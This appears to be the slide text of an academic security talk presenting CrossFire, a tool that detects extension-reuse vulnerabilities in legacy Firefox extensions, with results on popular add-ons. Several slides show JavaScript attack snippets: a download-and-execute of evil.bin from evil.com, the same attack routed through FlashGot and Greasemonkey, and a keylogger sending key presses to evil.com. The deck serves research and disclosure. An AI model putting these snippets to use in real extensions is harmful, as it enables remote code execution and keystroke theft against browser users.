
Automated Detection of Firefox Extension-Reuse Vulnerabilities - PowerPoint PPT Presentation



  1. Automated Detection of Firefox Extension-Reuse Vulnerabilities
     Ahmet S. Buyukkayhan, William Robertson

  2. Who are we? (William Robertson)
     • Assistant professor of computer science at Northeastern University in Boston, MA
     • Co-directs the NEU Systems Security Lab with Engin Kirda
     • Systems, network, and software security researcher
     • Past winner of DEFCON CTF with Shellphish (a long, long time ago…)

  3. Who are we? (Ahmet S. Buyukkayhan)
     • PhD candidate at Northeastern University
       – Authored peer-reviewed conference and journal papers in top-tier security venues
     • Member of the NEU Systems Security Lab

  4. Singapore

  5. Boston

  6. Agenda
     • Background
     • Extension-Reuse Attacks
     • CrossFire & Demo
     • Evaluation
     • Conclusion

  7. Background

  8. Browser Extensions
     • Add new capabilities and customization to browsers
     • ~15K extensions in the Mozilla Add-ons repository
     • Popular ones have millions of users
     • Mostly written in JavaScript

  9. Legacy Firefox Extensions
     • Shared JavaScript namespace
       – Extensions can read/write objects or variables of others
       – Can invoke functionality of others
     • Shared window
       – Read/write GUI elements
       – Listen to all events
     • No privilege separation
       – Full access to filesystem, network…
     [Figure: several XUL windows and their JavaScript share one namespace, sitting on XPCOM with direct access to the file system and the network]

  10. Threat Model
     • The browser is an attractive target
       – Extension authors are untrusted
     • Vulnerable extensions can be exploited
       – "Benign-but-buggy" threat model
     • Malicious extensions are a real threat
       – Trick users into installing malicious extensions
       – Powerful ("man-in-the-browser" attacks)
       – Easy to develop, difficult to detect
     Side note: 161 malicious extensions are blocked by Mozilla (https://addons.mozilla.org/en-US/firefox/blocked/, Feb 2016)

  11. Existing Methods for Protection
     • Enforcing browser marketplaces for extensions
       – Automated analysis
       – Human reviews
       – Extension signing
       – "Vetting"
     • Extension isolation
       – Least privilege and policy-based enforcement

  12. Add-on SDK (a.k.a., Jetpack)
     • Introduced in 2009
     • Isolates extensions from each other
     • Separate content and core scripts
     • Implements the principle of least privilege
     • But adoption has been slow
       – Share of the top 2,000 extensions using it: 12.0% (October 2014), 22.9% (March 2016)
     • Superseded by WebExtensions
       – Release date of WebExtensions: Q3 2016

  13. Extension-Reuse Attacks

  14. Attack Model
     [Figure: an evil extension that makes no sensitive calls of its own passes the vetting sandbox ("No Suspicious Behavior"); in the victim's browser it reaches the sensitive calls of Extension X and Extension Y]

  15. Impact
     • Lack of isolation leaves legacy extensions defenseless against capability leaks
     • Attackers can stitch together exploits by abusing capabilities
     • The more power vulnerable extensions have, the easier it is for an evil extension

  16. Download & Execute Evil Binary

      const WebBrowserPersist = Components.Constructor(
          "@mozilla.org/embedding/browser/nsWebBrowserPersist;1",
          "nsIWebBrowserPersist");
      var persist = WebBrowserPersist();
      var targetFile = Components.classes["@mozilla.org/file/local;1"]
          .createInstance(Components.interfaces.nsILocalFile);
      targetFile.initWithPath("evil.bin");
      persist.saveURI("http://evil.com/evil.bin", null, null, null, "", targetFile, null);
      targetFile.launch();

  17. Extension-reuse Attack Example
     The same download-and-execute, but every sensitive call is made by someone else's code: gFlashGotService belongs to FlashGot (Extension X), GM_PrefManager and GM_util to Greasemonkey (Extension Y).

      var files = [{
          href: $url,
          description: "",
          fname: $path,
          noRedir: true
      }];
      gFlashGotService.download(files);

      var gPrefMan = new GM_PrefManager();
      gPrefMan.setValue("editor", $path);
      GM_util.openInEditor();

     [Figure: the evil extension uses Extension X to download from the Internet to the file system and Extension Y to execute the downloaded file]

  18. To Reuse or Not To Reuse
     Without reuse, the evil extension makes the sensitive calls itself:

      const WebBrowserPersist = Components.Constructor(
          "@mozilla.org/embedding/browser/nsWebBrowserPersist;1",
          "nsIWebBrowserPersist");
      var persist = WebBrowserPersist();
      var targetFile = Components.classes["@mozilla.org/file/local;1"]
          .createInstance(Components.interfaces.nsILocalFile);
      targetFile.initWithPath($path);
      persist.saveURI($url, null, null, null, "", targetFile, null);
      targetFile.launch();

     With reuse, the evil extension's own code contains no sensitive call at all:

      var files = [{
          href: $url,
          description: "",
          fname: $path,
          noRedir: true
      }];
      gFlashGotService.download(files);

      var gPrefMan = new GM_PrefManager();
      gPrefMan.setValue("editor", $path);
      GM_util.openInEditor();

  19. Another Example
     • A key logger, which sends each key press to evil.com

      gd12.dicInline.urlWikPrefix = "http://evil.com/GD12_YOUR_LANG/steal.php?key=";
      gd12.keydownHandler = function(e) {
          gd12.dicInline.lookupWikt(String.fromCharCode(e.which), false, false);
      };
      gd12.init();

     [Figure: key presses travel from the browser over the Internet to evil.com]

  20. CrossFire

  21. CrossFire Overview
     [Figure: CrossFire architecture]

  22. DEMO

  23. Evaluation

  24. Method
     • Top 10 most downloaded extensions
       – Manual analysis on the full set
     • Top 2000 most downloaded extensions
       – Manual analysis on a random set of 323
     • Case study
       – Developed an extension with a cross-extension function call
       – Applied to full review

  25. Top 10 Firefox Extensions

     Extension Name         Automated Exploits  Manual Exploits  False Positives  # of Users
     Adblock Plus                    0                  0                4            22 M
     Video DownloadHelper            0                 15                0           6.5 M
     Firebug                         0                  1                0             3 M
     NoScript                        2                  5                2           2.5 M
     DownThemAll!                    0                  5                0           1.5 M
     Greasemonkey                    1                  3                2           1.5 M
     Web of Trust                    1                 33               15           1.3 M
     Flash Video Down.               4                  1                1           1.3 M
     FlashGot Mass Down.             3                  5                9           1.3 M
     Down. YouTube Videos            0                  2                1             1 M

  26. Summary of Results
     Detected vulnerabilities, random set (323 extensions):
       True positives    204  (80%)
       False positives    51  (20%)
     Positive vulnerabilities by attack type:
       Manual            255  (73%)
       Automated          96  (27%)

  27. Breakdown of Positive Vulnerabilities

     Category                Description                       Share of positives
     Network Access          Open a URI or download a file            66%
     File I/O                Read from/write to filesystem            16%
     Event Listener Reg.     Key logging events only                  12%
     Preference Access       Read/write browser settings               3%
     Code Execution          Execute binary or JS                      3%

  28. Performance
     • Fast static analysis: ~1 sec on average (per extension)

         Min      Q1       Median   Mean     Q3       Max
         0.05s    0.18s    0.28s    1.06s    0.51s    763.91s

     • Fast exploit generation: ~380 secs (~6 mins) on average (per exploit)

         Min      Q1       Median   Mean     Q3       Max
         30s      192s     270s     378.6s   550.8s   2160s
